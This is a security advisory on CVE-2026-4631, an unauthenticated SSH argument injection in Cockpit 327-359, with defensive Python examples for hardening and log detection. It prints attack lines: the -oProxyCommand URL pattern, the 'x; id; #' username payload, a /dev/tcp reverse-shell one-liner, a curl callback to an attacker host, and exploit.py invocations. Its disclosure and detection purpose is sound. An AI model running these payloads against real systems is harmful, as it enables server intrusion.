
Cockpit SSH Argument Injection RCE Affects Versions 327-359

Eng. Donya Bino Published  ·  10 min read
Updated on May 24, 2026


A security flaw in Cockpit allows an attacker to run arbitrary code on the server without authenticating first. The flaw lies in how Cockpit uses SSH arguments during the authentication process.

The vulnerability is identified as CVE-2026-4631 and affects Cockpit versions 327 through 359. It was discovered and reported by intx0x801 through review of Cockpit's source code.

Cockpit is commonly used as a management system for Linux servers, and it is set to listen on TCP port 9090 for remote management.

How the Vulnerability Works

The vulnerability can be reached through two separate vectors. Both stem from how Cockpit builds the SSH command when a user attempts to log in.

When Cockpit receives an authentication request, it builds an SSH command string from user-supplied parameters. These parameters are not properly sanitized before they are passed to the system shell, so an attacker can inject arbitrary SSH command-line arguments, which are executed at the Cockpit service's privilege level.

Attack Vector One: Hostname ProxyCommand Injection

The first vector uses the hostname parameter in the URL. An attacker sends a crafted URL such as ${target}/cockpit+=-oProxyCommand=${encoded_cmd}/login. The hostname portion of the URL is passed into the SSH command, where it is read as the ProxyCommand option, which instructs SSH to execute a command before the connection to the target is made.

The attacker's encoded command is carried in the ProxyCommand value and is executed server-side while SSH sets up the connection. This vector is effective with older versions of OpenSSH (prior to version 9.6).

Attack Vector Two: Username Token Injection

The second vector uses the username field of the Basic Auth header.

When processing usernames, Cockpit applies percent-r (%r) token replacement. This lets an attacker inject shell commands and semicolon characters as part of the username.

In the exploit, a username payload of x; id; # terminates the SSH command being run and comments out everything that follows in the command Cockpit built.

As a result, when Cockpit processes this username, the injected command executes on the target server.
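The flaw class behind both vectors, shown beside a hardened form, as an added example that is not Cockpit's code and not part of the original article. The function names and the allow-list patterns are assumptions chosen for illustration, and nothing is executed: the functions only return the argument list.

```python
import re

# Conservative allow-lists: assumptions for this example, not Cockpit's own rules.
HOST_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?")
USER_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_.-]{0,31}")


def build_ssh_argv_unsafe(host, user):
    """Flawed pattern: request values are placed where ssh still parses options."""
    return ["ssh", "-l", user, host]


def build_ssh_argv(host, user):
    """Hardened pattern: validate both values, then end option parsing with '--'."""
    if not HOST_RE.fullmatch(host):
        raise ValueError(f"rejected host: {host!r}")
    if not USER_RE.fullmatch(user):
        raise ValueError(f"rejected user: {user!r}")
    # An argv list (never a shell string) keeps ';' and '#' away from the caller's
    # shell. The user allow-list still matters because ssh expands %r inside
    # options such as ProxyCommand. '--' makes ssh read what follows as the host.
    return ["ssh", "-l", user, "--", host]


def check(host, user):
    """Return the argv the hardened builder produces, or the rejection reason."""
    try:
        return build_ssh_argv(host, user)
    except ValueError as exc:
        return str(exc)


# Constructed inputs modelled on the two vectors the article describes.
CASES = [
    ("web01.example", "admin"),
    ("-oProxyCommand=placeholder", "admin"),
    ("web01.example", "x; id; #"),
]

if __name__ == "__main__":
    for host, user in CASES:
        print("unsafe  :", build_ssh_argv_unsafe(host, user))
        print("hardened:", check(host, user))
```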

The Exploit Features

The Cockpit SSH argument injection RCE proof-of-concept exploit has several capabilities:

1. Time-based detection - The attacker can identify a potential target by issuing a sleep command, such as "sleep 5", and measuring how long the response takes. If the target takes longer than 5 seconds to respond, the attacker may consider it exploitable.

2. Reverse shell - The attacker can gain interactive access to the target system using a reverse shell payload (for example, using the command "bash -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1").

3. DNS callback detection - By executing a curl command to an attacker's DNS server (e.g., "curl http://<attacker controlled server>/[some page]?ip=$CLIENTIP"), an attacker can perform out-of-band DNS callback detection without needing to see the output of the executed command.

4. Bulk scanning - An attacker can also scan a list of multiple URLs to identify exploitable Cockpit instances at scale.

Affected Versions

Versions 327-359 of Cockpit are affected. Cockpit is one of many programs that run on Debian/Linux systems, usually over port 9090.

Users should determine whether they have the affected version of Cockpit and, if so, upgrade as soon as possible to an unaffected version of the software.

Examples of the Exploit Command

The proof-of-concept exploit can be run in several ways:

To test whether a target is susceptible using time-based detection, use: python exploit.py --target http://192.168.1.100:9090 --vector username
This sends a sleep 5 command to the target and uses the response time to determine whether exploitation is possible.

To obtain access via a reverse shell, use: python exploit.py --target http://192.168.1.100:9090 --vector username --lhost 192.168.1.50 --lport 4444
This makes the target connect back to the attacker's machine on port 4444.

To use DNS callback detection, use: python exploit.py --target http://192.168.1.100:9090 --vector hostname --callback attacker.com
This runs a DNS query against hostname.attacker.com from the target system.

Why This Vulnerability Is Critical

The Cockpit SSH argument injection RCE vulnerability is critical for several reasons:

1. Exploitation requires no authentication. The attacker does not need valid credentials, so any network user who can reach the Cockpit service port can attempt an exploit.

2. Exploitation gives attackers remote code execution on the target server, with all commands executing with the privileges of the Cockpit service.

3. Exploitation is easy and reliable because the proof-of-concept code functions as documented.

4. Cockpit has a wide attack surface: it is installed on many Linux servers, often where it can be reached from both local (internal) networks and the internet.

Detection Methods

The Cockpit SSH Argument Injection RCE vulnerability can be detected by administrators using various means:

1. Log Analysis: Search your logs for authentication attempts with unusual usernames, including but not limited to those containing a semicolon, a hash mark, or a similar command-injection pattern such as x; id; #.

2. URL Monitoring: Monitor logs and web servers for requests whose URL path contains the pattern "cockpit+=-oProxyCommand=", which indicates a potential attempt to exploit the vulnerability.

3. Time-Based Anomalies: The exploit uses "sleep" commands, so an authentication response that takes noticeably longer than normal is an indicator of attempted exploitation.

4. Outbound Connections: After exploitation, the attacker is likely to establish a reverse shell or make DNS callbacks to their own systems, so investigate any unexpected outbound connection from the Cockpit server.
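The URL and username checks from items 1 and 2, as an added example that is not part of the original article or of Cockpit. It assumes you have request records that include the path and the Authorization header (for instance from a reverse proxy or WAF in front of port 9090), and it generalizes slightly beyond the literal strings above: it flags any /cockpit+= host segment that begins with "-" and also decodes percent-encoded paths.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Host segment of a Cockpit remote-login path: /cockpit+=<host>/...
HOST_SEGMENT = re.compile(r"/cockpit\+=([^/]*)")
# ';' and '#' are the characters the article names; the rest are other shell metacharacters.
SHELL_META = re.compile(r"[;#|&`$<>\n]")


def basic_auth_username(header):
    """Return the username from a Basic Authorization header, or None."""
    scheme, _, blob = (header or "").partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        decoded = base64.b64decode(blob.strip(), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None
    return decoded.split(":", 1)[0]


def inspect_request(path, authorization=None):
    """Return a list of findings for one logged request."""
    findings = []
    decoded = unquote(unquote(path))  # two passes to catch double encoding
    match = HOST_SEGMENT.search(decoded)
    if match and match.group(1).startswith("-"):
        findings.append("hostname-option-injection")
    user = basic_auth_username(authorization)
    if user is not None and (user.startswith("-") or SHELL_META.search(user)):
        findings.append("username-shell-metacharacters")
    return findings


# Constructed sample records (path, Authorization header); not real traffic.
SAMPLE = [
    ("/cockpit/login", "Basic " + base64.b64encode(b"admin:pw").decode()),
    ("/cockpit+=web01.example/login", None),
    ("/cockpit+=-oProxyCommand%3Dplaceholder/login", None),
    ("/cockpit/login", "Basic " + base64.b64encode(b"x; id; #:pw").decode()),
]

if __name__ == "__main__":
    for path, auth in SAMPLE:
        print(path, inspect_request(path, auth))
```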

How to Protect Your Cockpit Installation

The Cockpit SSH argument injection RCE vulnerability requires immediate action.

1. Upgrade Cockpit: Check whether you can upgrade to a version of Cockpit that addresses the vulnerability, which is likely fixed in later versions (beyond v.359).

2. Restrict Network Access: If you are unable to upgrade immediately, limit access to the Cockpit port (i.e. port 9090) to trusted IP addresses only, because the vulnerability requires network access to exploit.

3. Utilize a Web Application Firewall (WAF): A WAF can help identify and block the injection patterns used against the vulnerability (e.g., semicolons in the username or the -oProxyCommand argument in the URL).

4. Monitor Logs: Exploitation attempts are recorded in authentication logs. A routine of active log monitoring will help you determine whether exploitation has been attempted.

5. Consider Other Remote Management Tools: If you are running a vulnerable version of Cockpit and have not yet patched it, consider using an alternative remote management solution or disabling Cockpit.

The Vulnerability of the OpenSSH Dependency

The hostname vector of the Cockpit SSH argument injection RCE depends on the -oProxyCommand option of the installed OpenSSH version.

Specifically, the ProxyCommand option instructs SSH to run a specified command before making the initial connection, and the attack uses it to execute arbitrary commands.

This method of injection works in OpenSSH versions prior to 9.6; later releases are reported to have additional defenses that prevent it.

Conclusion

The Cockpit SSH argument injection RCE vulnerability is a significant flaw in widely used server management software that allows an unauthenticated user to execute arbitrary commands.

The exploit is simple to use and reliable, and the Cockpit SSH argument injection RCE proof-of-concept code is publicly available.

If you run Cockpit on any server, check your version today, restrict network access to port 9090, and monitor your logs for signs of exploitation, because attackers are likely scanning for vulnerable Cockpit instances right now.

The Cockpit SSH argument injection RCE vulnerability shows that argument injection flaws in system management tools can lead to full server compromise, and these tools need the same security scrutiny as any other internet-facing service.

FAQ Section

Which Cockpit Versions Are Affected by CVE-2026-4631?

Cockpit versions 327 to 359 are affected by this vulnerability. You should update to a patched version past 359.

Does exploitation require authentication?

No. The Cockpit SSH argument injection RCE vulnerability has no authentication requirement. Unauthenticated attackers can exploit both the "Hostname ProxyCommand" vector and the "Username Token Injection" vector.

What can an attacker do after exploitation?

An attacker who exploits the flaw can execute any command on the target system with the privileges of the Cockpit service, including downloading malware, taking files from the compromised server, installing a method for remote access into the server, or using that server to attack other servers.

How can I tell whether my Cockpit server was hacked?

There are several ways to identify a breach of a Cockpit server:

1. Check your log files for unusual usernames, in particular ones containing characters such as ";" or "#", which may indicate a compromise.

2. Review your log files for the string "cockpit+=-oProxyCommand=", which may indicate unauthorized access.

3. Watch for unusual outbound connections from the Cockpit server or reverse shell activity, which may provide further evidence of a breach.

Is there a patch for CVE-2026-4631?

The only workaround for this vulnerability is to limit access to your Cockpit server on port 9090 to IP addresses that you trust. Cockpit versions 360 and above have been released since the vulnerability was identified, so it would be prudent to apply the most recent Cockpit updates before making any changes to port 9090 access.

Source: Exploit DB

 


© 2016 – 2026 Red Secure Tech Ltd. Registered in England and Wales — Company No: 15581067